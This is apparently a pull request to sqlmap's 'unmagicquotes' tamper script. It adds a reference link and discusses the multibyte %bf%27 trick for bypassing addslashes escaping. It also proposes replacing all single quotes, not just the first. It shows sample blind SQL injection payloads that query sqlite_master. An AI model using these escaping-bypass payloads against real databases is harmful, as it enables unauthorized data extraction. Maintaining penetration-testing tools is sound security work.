### PR TITLE
unmagicquotes: add ref + discussion

### DIFF
--- a/tamper/unmagicquotes.py
+++ b/tamper/unmagicquotes.py
@@ -24,6 +24,7 @@ def tamper(payload, **kwargs):
 
     Reference:
         * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
+        * https://lonewolfzero.wordpress.com/2017/07/03/addslashes-multibyte-sql-injection-mysql-and-php-case-study/
 
     >>> tamper("1' AND 1=1")
     '1%bf%27-- -'


### PR DESCRIPTION
1) I added [this](https://lonewolfzero.wordpress.com/2017/07/03/addslashes-multibyte-sql-injection-mysql-and-php-case-study/) ref that it explains the vulnerability better than the original

2) Should we add dependency on the DBMS `MySQL` since I saw only paper talking about this behavior in MySQL? Should we add another dependency on the char encoding because it is documented to work with Big5, GBK, and SJIS and others but not UTF-8 for example.

3) As the condition is written only the 1st single quote is replaced and not all occurrences, this modification to the code would allow to replace all single quotes:

```diff
-if payload[i] == '\'' and not found:
+if payload[i] == '\'':
```

With and without the modification:

```sql
1982347827 AND SUBSTR((SELECT HEX(COALESCE(CAST(COUNT(tbl_name) AS TEXT),CAST(X%bf%27 AS TEXT))) FROM sqlite_master WHERE type=CAST(X%bf%277461626c65%bf%27 AS TEXT)),1,1)>CAST(X%bf%2701%bf%27 AS TEXT)-- -

1982347827 AND SUBSTR((SELECT HEX(COALESCE(CAST(COUNT(tbl_name) AS TEXT),CAST(X%bf%27 AS TEXT))) FROM sqlite_master WHERE type=CAST(X'7461626c65' AS TEXT)),1,1)>CAST(X'01' AS TEXT)-- -
```

Or is it on purpose that only the 1st occurrence is replaced? Because I never read something about that.